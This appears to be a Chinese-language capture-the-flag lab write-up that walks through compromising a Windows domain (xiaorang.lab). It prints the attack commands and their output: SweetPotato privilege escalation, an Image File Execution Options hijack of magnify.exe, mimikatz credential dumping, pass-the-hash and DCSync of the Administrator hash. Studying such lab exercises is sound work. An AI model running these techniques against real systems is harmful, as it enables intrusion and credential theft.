又氪金了,viper好用捏
入口
端口扫描
1433端口开启了mssql服务并且得到了账号密码是sa:1qaz!QAZ
直接拿MDUT去连
先上线到viper(又重开了台机器)
然后直接上传甜土豆搞到system权限的shell
shell C:/Users/Public/SweetPotato.exe -a C:/Users/Public/1.exe
查看文件系统获得第一个flag
上传fscan扫内网,结果如下
start infoscan
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.46 is alive
[*] Icmp alive hosts len is: 4
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.15:88 open
172.22.8.46:135 open
172.22.8.31:445 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.46:139 open
172.22.8.31:139 open
172.22.8.15:139 open
172.22.8.18:139 open
172.22.8.31:135 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
[*] alive ports len is: 16
start vulscan
[*] NetBios: 172.22.8.15 [+]DC XIAORANG\DC01
[*] NetInfo:
[*]172.22.8.31
[->]WIN19-CLIENT
[->]172.22.8.31
[*] NetInfo:
[*]172.22.8.46
[->]WIN2016
[->]172.22.8.46
[*] NetBios: 172.22.8.31 XIAORANG\WIN19-CLIENT
[*] NetInfo:
[*]172.22.8.15
[->]DC01
[->]172.22.8.15
[*] NetInfo:
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[->]2001:0:348b:fb58:18ed:38d2:d89d:38b3
[*] NetBios: 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.8.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.8.46 code:200 len:703 title:IIS Windows Server
[+] mssql:172.22.8.18:1433:sa 1qaz!QAZ得知共有四台机器
172.22.8.18 搞定
172.22.8.15 域控
172.22.8.31 域内机器
172.22.8.46 域内机器shell net user发现还有个john用户
直接找到explorer然后进程注入上线john
shell net use发现john有共享文件
一眼丁真tsclient点题了,于是访问一下发现里面有个credential.txt
打开发现一个用户的用户名和密码 --> xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#,并且提示了hijack Image,搜了一下是映像劫持,好像是改注册表的
viper开个代理,proxychains4连接然后手动rdp登一下这个账号,发现要修改密码,而且还要一定复杂性,于是改成了Zys@gmzb!@#
试了一下,结果如下
172.22.8.15 rdp不上
172.22.8.31 登不了
172.22.8.46 成功登录莫名其妙rdesktop连上172.22.8.46后啥也干不了就断了,于是换proxyfiler挂代理windows连下,成功登录,太卡了太卡了
直接viper搞个端口转发把18上的1234端口转发到vps的监听器上,然后直接上线Aldrich
接下来估计就是那个映像劫持来提权啥的,一点不懂,直接抄
rdp里直接运行这个命令
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *结果如下
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
ersion\Image File Execution Options
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
ersion
PSChildName : Image File Execution Options
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
CentralAccessPolicyId :
CentralAccessPolicyName :
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV
ersion\Image File Execution Options
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : {System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAcce
ssRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.Regis
tryAccessRule...}
Sddl : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;B
U)(A;CI;KR;;;AC)
AccessToString : CREATOR OWNER Allow FullControl
NT AUTHORITY\Authenticated Users Allow SetValue, CreateSubKey, ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadKey
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
AuditToString :
AccessRightType : System.Security.AccessControl.RegistryRights
AccessRuleType : System.Security.AccessControl.RegistryAccessRule
AuditRuleType : System.Security.AccessControl.RegistryAuditRule
AreAccessRulesProtected : True
AreAuditRulesProtected : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical : True从中得知可以用账号密码登陆的用户都可以修改注册表
然后就直接运行这条命令并用放大镜提权
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"运行后左下角点击头像选锁定机器,然后右下角里面点一下放大镜,成功提权到system
shell里面运行一下之前的马,直接上线system,获得flag2
执行net group "domain admins" /domain可以发现WIN2016$在域管理里,就可以想办法hash传递来达到域控
msf里直接mimikatz
load kiwi
kiwi_cmd sekurlsa::logonpasswords拿到WIN2016$的hash
Authentication Id : 0 ; 15868125 (00000000:00f220dd)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/5/18 21:25:27
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 11e09d02069737e9646236f46a99effa
* SHA1 : 6f8536dc4da8df2113b93d48d242251918e23947
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : 19 b5 f6 22 6d 70 51 9b 6c a5 10 f4 c9 cf 9b e2 3c 65 fa 65 15 c4 79 74 32 ba 42 54 dc b4 df a5 ee d5 01 f4 e9 2d 3f 71 11 1a 23 6f 90 0b 68 bc 16 f0 ef 08 7e 2c a7 c1 95 7d a5 60 73 96 ea 90 5b 03 eb ce 66 68 a7 6a a9 52 43 85 cb 91 c1 75 ed 38 4c 61 1d 6f 18 11 25 cc c7 08 0e 46 c7 b0 90 be 68 40 b2 ae 03 35 1a 3d 78 3f 85 4a 4d 6c 40 b2 34 aa 63 90 0b 26 01 15 91 93 31 73 b3 84 bb 37 13 91 63 91 7f 51 04 3b 00 6f 79 fc 96 11 57 03 63 8b 8a 95 13 48 12 f7 43 e4 8f 85 1c 96 f7 17 3d b2 0f 41 34 ed f2 fc 3d 7e df 38 ca fd fc e0 37 26 4a e9 dd c9 76 73 6f a6 cb 49 29 2e 6c fd 8f f0 0c f5 00 26 b4 29 e5 79 e0 93 e6 8e 1a 7e 38 b3 d3 09 dc 3c 1b 40 08 b9 48 ae da 0a a0 cc 31 2f 83 18 c6 d9 6c e4 c4 73 dd cf 01 e1
ssp :
credman :直接注入hash
mimikatz_x64.exe
privilege::debug
sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:11e09d02069737e9646236f46a99effa然后dump域控hash
privilege::debug
lsadump::dcsync /domain:xiaorang.lab /user:Administrator
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2023/5/18 20:22:25
Object Security ID : S-1-5-21-3289074908-3315245560-3429321632-500
Object Relative ID : 500
Credentials:
Hash NTLM: 2c9d81bdcf3ec8b1def10328a7cc2f08
ntlm- 0: 2c9d81bdcf3ec8b1def10328a7cc2f08
ntlm- 1: 2c9d81bdcf3ec8b1def10328a7cc2f08
lm - 0: f5a2844be6f8377cf0870618cda7f97c得到域控hash
2c9d81bdcf3ec8b1def10328a7cc2f08然后直接hash传递登上域控机器172.22.8.15,拿到flag3
令人感叹
结束
